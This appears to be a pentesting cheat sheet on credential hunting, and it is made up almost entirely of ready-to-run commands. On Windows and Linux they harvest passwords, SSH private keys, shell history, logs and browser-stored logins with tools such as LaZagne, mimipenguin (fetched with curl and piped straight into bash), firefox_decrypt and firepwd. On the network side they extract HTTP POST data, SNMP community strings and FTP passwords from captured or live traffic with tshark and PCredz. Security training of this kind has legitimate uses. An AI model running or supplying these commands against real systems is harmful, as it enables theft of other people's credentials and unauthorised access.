💥Cyb3rBook

CREDENTIAL HUNTING

5 min read

PRIMARY CATEGORY → PASSWORD ATTACKS

Credential Hunting - Windows

Lazagne

Lazagne    •    Standalone Binaries

start lazagne.exe all
Verbose Output
start lazagne.exe -vv all
Findstr
findstr /SIM /C:'password' *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Credential Hunting - Linux

Credentials Resources
FILESHISTORYMEMORYKEY-RINGS
ConfigsLogsCacheBrowser Stored Creds
DatabasesCommand-Line HistoryIn-Memory Processing
Notes
Scripts
Source Code
Cronjobs
SSH Keys
Configuration Files

.conf    •    .config    •    .cnf    

Find
  • Search all Configuration Files on the System (Above File Extensions)
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done
  • Search for the specified Words in all the System Configuration Files
for _file in ".conf" ".config" ".cnf"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" -exec grep -iP --color -- 'user|password|pass' {} + 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done
Databases

.sql    •    .db    •    .bd

Find
  • Search all Database Files on the System (Above File Extensions)
for _file in ".sql" ".db" ".bd"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done
Notes
Find
find /home/* -type f -iname "*.txt" -o ! -iname "*.*"
Scripts

.py    •    .pyc    •    .pl    •    .go    •    .jar    •   &nbsp.c    •    .sh

Find
for _file in ".py" ".pyc" ".pl" ".go" ".jar" ".c" ".sh"
do
	printf "\nFile Extension:\n\n" "$_file"
	find / -iname "*${_file}" 2> /dev/null | grep -viP -- 'lib|fonts|share|core'
 
done
CronJobs
cat /etc/crontab
ls -la /etc/cron.*/
SSH Keys
SSH Private Keys
grep -RiP --color -- "PRIVATE KEY" / 2>/dev/null | grep ":1"
SSH Public Keys
grep -RiP --color -- "ssh-rsa" / 2>/dev/null | grep ":1"
History
Bash History
less /home/*/.bash*
Logs
for i in $(ls /var/log/* 2>/dev/null)
do
	GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null)
	if [[ $GREP ]] ; then
		echo -e "\n#### Log file: " $i
		grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null
	fi
done
Memory and Cache
Mimipenguin

Mimipenguin

  • Python Script
curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.py" --output mimipenguin.py
python3 !$
  • Bash Script
bash - < <( curl --silent --location --request GET "https://github.com/huntergregal/mimipenguin/raw/refs/heads/master/mimipenguin.sh" )
Lazagne

Lazagne

Setup
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
Execution
python3 ./Lazagne/Linux/laZagne.py all
Browsers
  • Firefox Stored Credentials

logins.json

Search for logins.json files
find /home/*/.mozilla/firefox -type d -iname '*default*'
Firefox Decrypt

Firefox Decrypt

curl --silent --location --request GET --remote-name "https://github.com/unode/firefox_decrypt/raw/refs/heads/main/firefox_decrypt.py"
python3 firefox_decrypt.py
Firepwd

Firepwd

git clone https://github.com/lclevy/firepwd Firepwd
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Firepwd/requirements.txt
python3 ./Firepwd/firepwd.py # Or
python3 ./Firepwd/firepwd.py --dir=<DIRECTORY_PROFILE>
Lazagne

Lazagne

  • Setup ⚙️
git clone https://github.com/AlessandroZ/LaZagne Lazagne
python3 -m venv .venv
. !$/bin/activate && pip3 install -r ./Lazagne/requirements.txt
  • Execution ⚒️
python3 ./Lazagne/Linux/laZagne.py browsers

Credential Hunting in Network Traffic

We can only extract data from the captured packets when a given protocol is not end-to-end encrypted

That is, if an attacker intercepts packets from an HTTP Connection between a client and a Web Server, the data contained in these packets cannot be extracted unless the attacker knows the key

In that case, since the Encryption Method used in a client-server architecture is usually a Symmetric Cypher, the attacker could use that key to decrypt those packets and extract all the data in plain format

TShark

TShark

HTTP

Encrypted Counterpart → HTTPS

  • HTTP POST Data (POST Parameters’ value)

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'http.request.method == POST' -T fields -e http.file_data 2> /dev/null

From Live Traffic

tshark --interface <INTERFACE> -Y 'http.request.method == POST' -T fields -e http.file_data 2> /dev/null
SNMP

Encrypted Counterpart → SNMPv3

  • SNMP Community String

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'snmp' -T fields -e snmp.community 2> /dev/null | sort -u

From Live Traffic

tshark --interface <INTERFACE> -Y 'snmp' -T fields -e snmp.community 2> /dev/null
FTP

Encrypted Counterpart → FTPS

  • FTP Login (User and Password)

From a given Capture File e.g. Pcap

tshark -r <CAPTURE_FILE> -Y 'ftp.request.command == USER or ftp.request.command == PASS' -T fields -e ftp.request.command -e ftp.request.arg -E separator=: 2> /dev/null

From Live Traffic

tshark --interface <INTERFACE> -Y 'ftp.request.command == USER or ftp.request.command == PASS' -T fields -e ftp.request.command -e ftp.request.arg -E separator=: 2> /dev/null
PCredz

PCredz

Setup
apt install -y -- python3-pip libpcap-dev file
python3 -m venv .venv
source !$/bin/activate
pip3 install Cython python-libpcap
git clone https://github.com/lgandx/PCredz PCredz
Creds Extraction

From a given Capture File e.g. Pcap

python3 PCredz -v -f <CAPTURE_FILE>

Graph View

Backlinks